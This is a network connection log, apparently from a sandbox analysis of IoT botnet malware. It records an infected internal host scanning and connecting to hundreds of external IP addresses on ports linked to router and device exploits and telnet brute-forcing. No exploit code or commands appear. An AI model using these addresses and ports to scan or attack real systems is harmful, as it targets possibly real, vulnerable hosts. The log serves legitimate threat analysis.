Source: global traffic | TCP traffic: 129.177.173.85 ports 2,5,6,8,9,52869 |
Source: global traffic | TCP traffic: 158.130.170.201 ports 1,2,3,5,7,37215 |
Source: global traffic | TCP traffic: 185.57.154.59 ports 1,2,4,5,9,49152 |
Source: global traffic | TCP traffic: 180.142.151.223 ports 1,2,4,5,9,49152 |
Source: global traffic | TCP traffic: 70.83.19.226 ports 2,5,6,8,9,52869 |
Source: global traffic | TCP traffic: 148.228.211.150 ports 1,2,3,5,7,37215 |
Source: global traffic | TCP traffic: 218.1.134.21 ports 1,2,4,5,9,49152 |
Source: global traffic | TCP traffic: 181.215.101.174 ports 1,2,4,5,9,49152 |
Source: global traffic | TCP traffic: 6.158.170.206 ports 1,2,4,5,9,49152 |
Source: global traffic | TCP traffic: 85.124.222.42 ports 1,2,4,5,9,49152 |
Source: global traffic | TCP traffic: 165.94.66.173 ports 1,2,4,5,9,49152 |
Source: global traffic | TCP traffic: 84.49.20.203 ports 1,2,3,5,7,37215 |
Source: global traffic | TCP traffic: 126.241.242.120 ports 1,2,3,5,7,37215 |
Source: global traffic | TCP traffic: 148.53.105.39 ports 1,2,3,5,7,37215 |
Source: global traffic | TCP traffic: 163.224.207.250 ports 1,2,3,5,7,37215 |
Source: global traffic | TCP traffic: 47.83.189.211 ports 1,2,3,5,7,37215 |
Source: global traffic | TCP traffic: 186.149.104.105 ports 2,5,6,8,9,52869 |
Source: global traffic | TCP traffic: 105.109.18.186 ports 1,2,4,5,9,49152 |
Source: global traffic | TCP traffic: 83.190.231.93 ports 1,2,3,5,7,37215 |
Source: global traffic | TCP traffic: 113.203.125.76 ports 1,2,4,5,9,49152 |
Source: global traffic | TCP traffic: 96.186.107.158 ports 2,5,6,8,9,52869 |
Source: global traffic | TCP traffic: 113.37.245.122 ports 1,2,4,5,9,49152 |
Source: global traffic | TCP traffic: 94.202.222.110 ports 2,5,6,8,9,52869 |
Source: global traffic | TCP traffic: 29.5.215.81 ports 1,2,3,5,7,37215 |
Source: global traffic | TCP traffic: 132.228.243.137 ports 2,5,6,8,9,52869 |
Source: global traffic | TCP traffic: 77.188.2.23 ports 1,2,4,5,9,49152 |
Source: global traffic | TCP traffic: 160.116.99.47 ports 2,5,6,8,9,52869 |
Source: global traffic | TCP traffic: 24.87.139.212 ports 1,2,3,5,7,37215 |
Source: global traffic | TCP traffic: 204.7.247.28 ports 2,5,6,8,9,52869 |
Source: global traffic | TCP traffic: 137.33.28.160 ports 2,5,6,8,9,52869 |
Source: global traffic | TCP traffic: 113.237.9.87 ports 1,2,3,5,7,37215 |
Source: global traffic | TCP traffic: 4.122.58.30 ports 1,2,3,5,7,37215 |
Source: global traffic | TCP traffic: 174.9.64.0 ports 1,2,3,5,7,37215 |
Source: global traffic | TCP traffic: 56.89.187.128 ports 2,5,6,8,9,52869 |
Source: global traffic | TCP traffic: 182.150.145.27 ports 1,2,3,5,7,37215 |
Source: global traffic | TCP traffic: 180.195.241.242 ports 1,2,4,5,9,49152 |
Source: global traffic | TCP traffic: 61.67.234.110 ports 1,2,4,5,9,49152 |
Source: global traffic | TCP traffic: 189.124.245.91 ports 1,2,3,5,7,37215 |
Source: global traffic | TCP traffic: 192.168.2.20:34160 -> 140.39.206.54:81 |
Source: global traffic | TCP traffic: 192.168.2.20:60110 -> 108.39.69.131:8443 |
Source: global traffic | TCP traffic: 192.168.2.20:47760 -> 131.99.110.247:81 |
Source: global traffic | TCP traffic: 192.168.2.20:38738 -> 3.51.62.125:8080 |
Source: global traffic | TCP traffic: 192.168.2.20:33152 -> 28.86.70.243:8443 |
Source: global traffic | TCP traffic: 192.168.2.20:52282 -> 171.112.221.128:8080 |
Source: global traffic | TCP traffic: 192.168.2.20:38246 -> 85.117.188.205:8080 |
Source: global traffic | TCP traffic: 192.168.2.20:45272 -> 105.109.18.186:49152 |
Source: global traffic | TCP traffic: 192.168.2.20:43144 -> 29.5.215.81:37215 |
Source: global traffic | TCP traffic: 192.168.2.20:35236 -> 8.114.30.17:8443 |
Source: global traffic | TCP traffic: 192.168.2.20:39800 -> 4.186.238.93:7574 |
Source: global traffic | TCP traffic: 192.168.2.20:48414 -> 85.124.222.42:49152 |
Source: global traffic | TCP traffic: 192.168.2.20:57344 -> 13.229.32.133:7574 |
Source: global traffic | TCP traffic: 192.168.2.20:33480 -> 138.94.203.237:49152 |
Source: global traffic | TCP traffic: 192.168.2.20:60366 -> 84.219.17.176:8080 |
Source: global traffic | TCP traffic: 192.168.2.20:60856 -> 165.94.66.173:49152 |
Source: global traffic | TCP traffic: 192.168.2.20:42290 -> 163.60.176.218:8443 |
Source: global traffic | TCP traffic: 192.168.2.20:59730 -> 174.9.64.0:37215 |
Source: global traffic | TCP traffic: 192.168.2.20:50870 -> 217.196.154.24:52869 |
Source: global traffic | TCP traffic: 192.168.2.20:38960 -> 43.162.206.133:7574 |
Source: global traffic | TCP traffic: 192.168.2.20:34734 -> 79.58.62.70:8080 |
Source: global traffic | TCP traffic: 192.168.2.20:54256 -> 180.195.241.242:49152 |
Source: global traffic | TCP traffic: 192.168.2.20:55482 -> 113.203.125.76:49152 |
Source: global traffic | TCP traffic: 192.168.2.20:33332 -> 124.94.21.94:8443 |
Source: global traffic | TCP traffic: 192.168.2.20:53384 -> 125.178.212.248:81 |
Source: global traffic | TCP traffic: 192.168.2.20:52468 -> 181.215.101.174:49152 |
Source: global traffic | TCP traffic: 192.168.2.20:59820 -> 146.97.112.184:8080 |
Source: global traffic | TCP traffic: 192.168.2.20:56094 -> 113.237.9.87:37215 |
Source: global traffic | TCP traffic: 192.168.2.20:38442 -> 65.192.2.39:7574 |
Source: global traffic | TCP traffic: 192.168.2.20:60092 -> 83.106.49.27:81 |
Source: global traffic | TCP traffic: 192.168.2.20:56100 -> 100.221.5.250:8443 |
Source: global traffic | TCP traffic: 192.168.2.20:57922 -> 74.164.3.48:7574 |
Source: global traffic | TCP traffic: 192.168.2.20:39938 -> 70.83.19.226:52869 |
Source: global traffic | TCP traffic: 192.168.2.20:55898 -> 121.204.171.153:8443 |
Source: global traffic | TCP traffic: 192.168.2.20:49652 -> 61.114.5.135:8443 |
Source: global traffic | TCP traffic: 192.168.2.20:59844 -> 219.13.241.116:81 |
Source: global traffic | TCP traffic: 192.168.2.20:42368 -> 221.79.66.124:8443 |
Source: global traffic | TCP traffic: 192.168.2.20:50640 -> 111.176.24.214:7574 |
Source: global traffic | TCP traffic: 192.168.2.20:46158 -> 79.29.184.178:8080 |
Source: global traffic | TCP traffic: 192.168.2.20:38326 -> 158.130.170.201:37215 |
Source: global traffic | TCP traffic: 192.168.2.20:42426 -> 133.39.215.101:7574 |
Source: global traffic | TCP traffic: 192.168.2.20:34400 -> 95.245.196.212:8080 |
Source: global traffic | TCP traffic: 192.168.2.20:41906 -> 15.115.105.212:7574 |
Source: global traffic | TCP traffic: 192.168.2.20:46340 -> 199.218.221.131:49152 |
Source: global traffic | TCP traffic: 192.168.2.20:58966 -> 173.150.244.104:81 |
Source: global traffic | TCP traffic: 192.168.2.20:37704 -> 157.94.79.109:5555 |
Source: global traffic | TCP traffic: 192.168.2.20:44436 -> 137.81.200.232:5555 |
Source: global traffic | TCP traffic: 192.168.2.20:51872 -> 101.196.228.55:81 |
Source: global traffic | TCP traffic: 192.168.2.20:46588 -> 187.188.141.244:81 |
Source: global traffic | TCP traffic: 192.168.2.20:40230 -> 90.205.13.29:8080 |
Source: global traffic | TCP traffic: 192.168.2.20:58940 -> 29.150.145.46:5555 |
Source: global traffic | TCP traffic: 192.168.2.20:41558 -> 92.77.238.132:49152 |
Source: global traffic | TCP traffic: 192.168.2.20:58142 -> 168.120.224.251:7574 |
Source: global traffic | TCP traffic: 192.168.2.20:50236 -> 95.75.250.127:8080 |
Source: global traffic | TCP traffic: 192.168.2.20:32984 -> 196.95.13.165:81 |
Source: global traffic | TCP traffic: 192.168.2.20:54874 -> 167.55.9.142:8080 |
Source: global traffic | TCP traffic: 192.168.2.20:57612 -> 196.37.30.71:8443 |
Source: global traffic | TCP traffic: 192.168.2.20:58382 -> 84.138.43.63:7574 |
Source: global traffic | TCP traffic: 192.168.2.20:53924 -> 150.78.74.139:8080 |
Source: global traffic | TCP traffic: 192.168.2.20:34402 -> 90.251.63.152:8080 |
Source: global traffic | TCP traffic: 192.168.2.20:53456 -> 92.171.56.228:49152 |
Source: global traffic | TCP traffic: 192.168.2.20:36200 -> 152.1.210.168:5555 |
Source: global traffic | TCP traffic: 192.168.2.20:52424 -> 181.63.57.94:7574 |
Source: global traffic | TCP traffic: 192.168.2.20:40720 -> 82.134.248.77:37215 |
Source: global traffic | TCP traffic: 192.168.2.20:34142 -> 186.149.104.105:52869 |
Source: global traffic | TCP traffic: 192.168.2.20:48984 -> 166.120.234.132:81 |
Source: global traffic | TCP traffic: 192.168.2.20:45526 -> 148.53.105.39:37215 |
Source: global traffic | TCP traffic: 192.168.2.20:39264 -> 34.46.25.239:52869 |
Source: global traffic | TCP traffic: 192.168.2.20:53420 -> 122.96.117.78:8443 |
Source: global traffic | TCP traffic: 192.168.2.20:42746 -> 2.24.204.7:5555 |
Source: global traffic | TCP traffic: 192.168.2.20:54634 -> 206.112.48.85:8080 |
Source: global traffic | TCP traffic: 192.168.2.20:35258 -> 221.97.211.57:81 |
Source: global traffic | TCP traffic: 192.168.2.20:51844 -> 132.228.243.137:52869 |
Source: global traffic | TCP traffic: 192.168.2.20:59118 -> 118.33.128.115:8080 |
Source: global traffic | TCP traffic: 192.168.2.20:51128 -> 64.134.176.11:8080 |
Source: global traffic | TCP traffic: 192.168.2.20:43806 -> 148.228.211.150:37215 |
Source: global traffic | TCP traffic: 192.168.2.20:37272 -> 87.76.103.18:8080 |
Source: global traffic | TCP traffic: 192.168.2.20:55578 -> 47.25.134.25:8443 |
Source: global traffic | TCP traffic: 192.168.2.20:46920 -> 191.200.219.2:7574 |
Source: global traffic | TCP traffic: 192.168.2.20:47240 -> 180.142.151.223:49152 |
Source: global traffic | TCP traffic: 192.168.2.20:52002 -> 37.198.54.7:5555 |
Source: global traffic | TCP traffic: 192.168.2.20:58734 -> 14.98.32.156:81 |
Source: global traffic | TCP traffic: 192.168.2.20:39050 -> 47.238.39.43:5555 |
Source: global traffic | TCP traffic: 192.168.2.20:34252 -> 29.198.53.231:8080 |
Source: global traffic | TCP traffic: 192.168.2.20:59336 -> 84.49.20.203:37215 |
Source: global traffic | TCP traffic: 192.168.2.20:39838 -> 86.146.123.31:5555 |
Source: global traffic | TCP traffic: 192.168.2.20:59832 -> 32.217.189.23:7574 |
Source: global traffic | TCP traffic: 192.168.2.20:47362 -> 182.150.145.27:37215 |
Source: global traffic | TCP traffic: 192.168.2.20:42540 -> 37.25.2.203:8443 |
Source: global traffic | TCP traffic: 192.168.2.20:34066 -> 146.53.108.229:7574 |
Source: global traffic | TCP traffic: 192.168.2.20:38360 -> 167.105.144.22:7574 |
Source: global traffic | TCP traffic: 192.168.2.20:60418 -> 132.254.4.175:8443 |
Source: global traffic | TCP traffic: 192.168.2.20:43554 -> 96.186.107.158:52869 |
Source: global traffic | TCP traffic: 192.168.2.20:35612 -> 54.87.34.198:5555 |
Source: global traffic | TCP traffic: 192.168.2.20:45608 -> 24.87.139.212:37215 |
Source: global traffic | TCP traffic: 192.168.2.20:51162 -> 23.95.18.129:7574 |
Source: global traffic | TCP traffic: 192.168.2.20:56194 -> 193.223.49.13:81 |
Source: global traffic | TCP traffic: 192.168.2.20:34122 -> 80.223.16.203:7574 |
Source: global traffic | TCP traffic: 192.168.2.20:37600 -> 149.88.110.90:7574 |
Source: global traffic | TCP traffic: 192.168.2.20:49262 -> 183.182.79.172:7574 |
Source: global traffic | TCP traffic: 192.168.2.20:56704 -> 82.179.61.132:8080 |
Source: global traffic | TCP traffic: 192.168.2.20:52170 -> 185.32.224.106:8080 |
Source: global traffic | TCP traffic: 192.168.2.20:51884 -> 4.122.58.30:37215 |
Source: global traffic | TCP traffic: 192.168.2.20:38142 -> 171.156.169.94:8443 |
Source: global traffic | TCP traffic: 192.168.2.20:50394 -> 189.124.245.91:37215 |
Source: global traffic | TCP traffic: 192.168.2.20:40552 -> 137.33.28.160:52869 |
Source: global traffic | TCP traffic: 192.168.2.20:46764 -> 160.49.32.226:49152 |
Source: global traffic | TCP traffic: 192.168.2.20:49828 -> 77.188.2.23:49152 |
Source: global traffic | TCP traffic: 192.168.2.20:60188 -> 39.70.239.74:8443 |
Source: global traffic | TCP traffic: 192.168.2.20:38156 -> 153.251.110.103:8080 |
Source: global traffic | TCP traffic: 192.168.2.20:37816 -> 6.158.170.206:49152 |
Source: global traffic | TCP traffic: 192.168.2.20:44044 -> 102.239.181.86:8443 |
Source: global traffic | TCP traffic: 192.168.2.20:51112 -> 138.244.0.154:8080 |
Source: global traffic | TCP traffic: 192.168.2.20:50090 -> 56.89.187.128:52869 |
Source: global traffic | TCP traffic: 192.168.2.20:38736 -> 193.74.200.139:8080 |
Source: global traffic | TCP traffic: 192.168.2.20:49988 -> 50.160.226.168:5555 |
Source: global traffic | TCP traffic: 192.168.2.20:32842 -> 93.58.202.130:7574 |
Source: global traffic | TCP traffic: 192.168.2.20:52204 -> 65.114.175.95:81 |
Source: global traffic | TCP traffic: 192.168.2.20:49222 -> 201.144.37.239:7574 |
Source: global traffic | TCP traffic: 192.168.2.20:39886 -> 153.215.244.192:8080 |
Source: global traffic | TCP traffic: 192.168.2.20:55388 -> 177.16.24.154:8080 |
Source: global traffic | TCP traffic: 192.168.2.20:58490 -> 26.139.153.168:37215 |
Source: global traffic | TCP traffic: 192.168.2.20:54464 -> 193.215.254.49:5555 |
Source: global traffic | TCP traffic: 192.168.2.20:45310 -> 9.244.6.205:5555 |
Source: global traffic | TCP traffic: 192.168.2.20:45620 -> 126.17.192.94:8443 |
Source: global traffic | TCP traffic: 192.168.2.20:55314 -> 89.246.214.5:81 |
Source: global traffic | TCP traffic: 192.168.2.20:38496 -> 113.178.32.186:7574 |
Source: global traffic | TCP traffic: 192.168.2.20:42012 -> 22.111.96.211:8443 |
Source: global traffic | TCP traffic: 192.168.2.20:55546 -> 129.177.173.85:52869 |
Source: global traffic | TCP traffic: 192.168.2.20:51724 -> 194.45.74.136:8080 |
Source: global traffic | TCP traffic: 192.168.2.20:52062 -> 217.175.214.110:8080 |
Source: global traffic | TCP traffic: 192.168.2.20:52990 -> 185.57.154.59:49152 |
Source: global traffic | TCP traffic: 192.168.2.20:56420 -> 103.119.246.183:8080 |
Source: global traffic | TCP traffic: 192.168.2.20:56202 -> 210.7.21.57:8080 |
Source: global traffic | TCP traffic: 192.168.2.20:39758 -> 46.254.1.124:52869 |
Source: global traffic | TCP traffic: 192.168.2.20:46990 -> 83.190.231.93:37215 |
Source: global traffic | TCP traffic: 192.168.2.20:39368 -> 24.209.150.53:8080 |
Source: global traffic | TCP traffic: 192.168.2.20:60754 -> 14.106.178.189:52869 |
Source: global traffic | TCP traffic: 192.168.2.20:57620 -> 21.1.86.6:8080 |
Source: global traffic | TCP traffic: 192.168.2.20:54840 -> 29.210.78.250:8080 |
Source: global traffic | TCP traffic: 192.168.2.20:51062 -> 9.214.29.162:8080 |
Source: global traffic | TCP traffic: 192.168.2.20:52094 -> 59.238.28.165:8080 |
Source: global traffic | TCP traffic: 192.168.2.20:33122 -> 23.136.108.3:5555 |
Source: global traffic | TCP traffic: 192.168.2.20:52764 -> 39.150.243.95:8080 |
Source: global traffic | TCP traffic: 192.168.2.20:58240 -> 95.235.124.24:8080 |
Source: global traffic | TCP traffic: 192.168.2.20:37498 -> 162.248.240.36:8080 |
Source: global traffic | TCP traffic: 192.168.2.20:49178 -> 37.192.71.218:8080 |
Source: global traffic | TCP traffic: 192.168.2.20:60294 -> 203.154.69.97:8080 |
Source: global traffic | TCP traffic: 192.168.2.20:44870 -> 26.95.223.242:49152 |
Source: global traffic | TCP traffic: 192.168.2.20:49784 -> 207.209.5.215:81 |
Source: global traffic | TCP traffic: 192.168.2.20:35608 -> 65.18.49.14:5555 |
Source: global traffic | TCP traffic: 192.168.2.20:56108 -> 160.116.99.47:52869 |
Source: global traffic | TCP traffic: 192.168.2.20:57424 -> 207.36.97.217:8080 |
Source: global traffic | TCP traffic: 192.168.2.20:60416 -> 126.241.242.120:37215 |
Source: global traffic | TCP traffic: 192.168.2.20:45724 -> 180.222.24.104:5555 |
Source: global traffic | TCP traffic: 192.168.2.20:34852 -> 1.249.43.22:8080 |
Source: global traffic | TCP traffic: 192.168.2.20:33926 -> 113.37.245.122:49152 |
Source: global traffic | TCP traffic: 192.168.2.20:43820 -> 83.26.49.216:8080 |
Source: global traffic | TCP traffic: 192.168.2.20:53818 -> 218.1.134.21:49152 |
Source: global traffic | TCP traffic: 192.168.2.20:36190 -> 94.202.222.110:52869 |
Source: global traffic | TCP traffic: 192.168.2.20:55414 -> 163.224.207.250:37215 |
Source: global traffic | TCP traffic: 192.168.2.20:50874 -> 165.192.86.199:8080 |
Source: global traffic | TCP traffic: 192.168.2.20:47924 -> 47.97.84.96:5555 |
Source: global traffic | TCP traffic: 192.168.2.20:36000 -> 98.76.121.141:8443 |
Source: global traffic | TCP traffic: 192.168.2.20:56512 -> 5.253.168.79:8080 |
Source: global traffic | TCP traffic: 192.168.2.20:60868 -> 159.199.114.171:7574 |
Source: global traffic | TCP traffic: 192.168.2.20:42254 -> 21.186.96.232:8080 |
Source: global traffic | TCP traffic: 192.168.2.20:52564 -> 63.193.129.128:8080 |
Source: global traffic | TCP traffic: 192.168.2.20:48530 -> 142.143.222.228:49152 |
Source: global traffic | TCP traffic: 192.168.2.20:45344 -> 159.117.140.27:5555 |
Source: global traffic | TCP traffic: 192.168.2.20:43498 -> 159.162.153.137:37215 |
Source: global traffic | TCP traffic: 192.168.2.20:53998 -> 93.191.87.190:8080 |
Source: global traffic | TCP traffic: 192.168.2.20:50786 -> 108.222.27.30:7574 |
Source: global traffic | TCP traffic: 192.168.2.20:56256 -> 69.247.179.164:8080 |
Source: global traffic | TCP traffic: 192.168.2.20:42292 -> 17.188.17.96:8443 |
Source: global traffic | TCP traffic: 192.168.2.20:38076 -> 120.218.153.188:5555 |
Source: global traffic | TCP traffic: 192.168.2.20:40178 -> 177.237.69.156:8443 |
Source: global traffic | TCP traffic: 192.168.2.20:34046 -> 116.13.184.201:8080 |
Source: global traffic | TCP traffic: 192.168.2.20:33188 -> 121.120.108.73:8080 |
Source: global traffic | TCP traffic: 192.168.2.20:51562 -> 18.24.141.168:7574 |
Source: global traffic | TCP traffic: 192.168.2.20:39098 -> 166.55.57.24:8080 |
Source: global traffic | TCP traffic: 192.168.2.20:38220 -> 24.105.81.145:81 |
Source: global traffic | TCP traffic: 192.168.2.20:52676 -> 61.67.234.110:49152 |
Source: global traffic | TCP traffic: 192.168.2.20:46246 -> 124.22.25.41:7574 |
Source: global traffic | TCP traffic: 192.168.2.20:57714 -> 90.85.134.44:81 |
Source: global traffic | TCP traffic: 192.168.2.20:53760 -> 77.25.98.191:81 |
Source: global traffic | TCP traffic: 192.168.2.20:34962 -> 197.167.218.125:8080 |
Source: global traffic | TCP traffic: 192.168.2.20:40784 -> 76.209.219.87:8443 |
Source: global traffic | TCP traffic: 192.168.2.20:46100 -> 69.110.51.44:8443 |
Source: global traffic | TCP traffic: 192.168.2.20:55020 -> 147.139.103.203:7574 |
Source: global traffic | TCP traffic: 192.168.2.20:51804 -> 170.147.88.37:81 |
Source: global traffic | TCP traffic: 192.168.2.20:34932 -> 21.229.198.23:7574 |
Source: global traffic | TCP traffic: 192.168.2.20:32774 -> 47.83.189.211:37215 |
Source: global traffic | TCP traffic: 192.168.2.20:47434 -> 119.97.159.234:81 |
Source: global traffic | TCP traffic: 192.168.2.20:57750 -> 142.66.89.80:8080 |
Source: global traffic | TCP traffic: 192.168.2.20:54354 -> 5.182.95.91:8443 |
Source: global traffic | TCP traffic: 192.168.2.20:50732 -> 204.7.247.28:52869 |
Source: global traffic | TCP traffic: 192.168.2.20:59964 -> 77.190.22.139:49152 |
Source: global traffic | TCP traffic: 192.168.2.20:56096 -> 137.38.149.182:8080 |
Source: global traffic | TCP traffic: 192.168.2.20:35162 -> 173.27.94.3:8080 |
Source: global traffic | TCP traffic: 192.168.2.20:47922 -> 18.119.229.111:5555 |
Source: global traffic | TCP traffic: 192.168.2.20:33810 -> 91.97.247.73:5555 |
Source: global traffic | TCP traffic: 192.168.2.20:41594 -> 71.132.177.20:8080 |
Source: global traffic | TCP traffic: 192.168.2.20:34350 -> 157.100.221.142:7574 |
Source: global traffic | TCP traffic: 192.168.2.20:36164 -> 152.39.226.53:7574 |
Source: global traffic | TCP traffic: 192.168.2.20:37252 -> 25.97.66.170:8080 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 34.30.246.129:1023 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 72.193.100.130:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 191.130.205.66:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 168.204.132.3:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 135.234.161.92:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 112.246.212.82:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 165.200.2.58:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 110.14.87.91:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 69.122.31.78:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 128.13.11.190:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 63.34.109.151:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 207.13.36.47:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 117.25.72.12:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 165.218.11.121:1023 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 117.134.250.209:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 58.128.23.30:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 13.201.155.93:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 18.115.11.94:1023 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 156.48.180.246:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 182.202.90.106:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 195.166.0.203:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 184.155.146.118:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 76.87.157.247:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 203.161.28.140:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 106.45.219.74:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 74.210.56.125:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 113.24.69.141:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 144.65.254.202:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 217.86.72.178:1023 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 212.86.101.169:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 156.167.187.20:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 110.180.211.39:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 105.250.71.183:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 113.117.19.31:1023 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 190.79.231.15:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 216.51.208.52:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 219.250.235.42:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 101.228.8.80:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 188.156.60.139:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 20.53.214.183:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 109.102.41.71:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 38.185.158.237:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 161.185.182.176:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 155.94.214.223:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 171.229.255.155:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 59.170.49.101:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 76.18.135.232:1023 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 87.46.40.109:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 194.99.193.132:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 165.139.243.212:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:55946 -> 204.109.84.136:81 |
Source: global traffic | TCP traffic: 192.168.2.20:35348 -> 31.193.226.180:8080 |
Source: global traffic | TCP traffic: 192.168.2.20:54052 -> 44.10.103.216:5555 |
Source: global traffic | TCP traffic: 192.168.2.20:57812 -> 93.181.246.124:5555 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 154.6.180.223:1023 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 141.139.80.101:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 2.230.195.56:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 223.97.173.137:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 217.240.242.190:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 203.83.23.203:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 79.208.167.77:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 42.145.28.245:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 65.31.148.132:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 47.122.79.104:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 65.242.108.69:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 112.119.61.98:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 41.49.78.125:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 195.230.69.221:1023 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 63.52.115.246:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 126.30.13.96:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 105.77.104.149:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 18.230.18.46:1023 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 2.244.147.91:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 185.172.74.196:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 216.145.209.20:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 17.126.4.235:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 121.28.54.241:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 9.244.15.80:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 44.18.123.183:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 169.152.233.0:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 100.141.74.188:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 118.236.95.38:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 178.202.58.218:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 76.193.220.157:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 92.20.133.175:1023 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 102.142.214.179:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 88.238.140.155:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 97.150.200.170:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 180.170.49.199:1023 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 164.164.43.169:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 114.246.247.40:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 204.33.185.101:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 85.191.251.134:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 212.132.188.177:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 218.32.181.216:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 110.253.81.237:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 162.95.29.118:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 70.202.218.130:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 213.195.7.12:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 57.43.198.84:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 84.54.89.100:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 86.87.253.62:1023 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 195.112.142.130:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 91.159.184.30:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:51003 -> 79.73.229.27:2323 |
Source: global traffic | TCP traffic: 192.168.2.20:55758 -> 29.166.118.161:52869 |
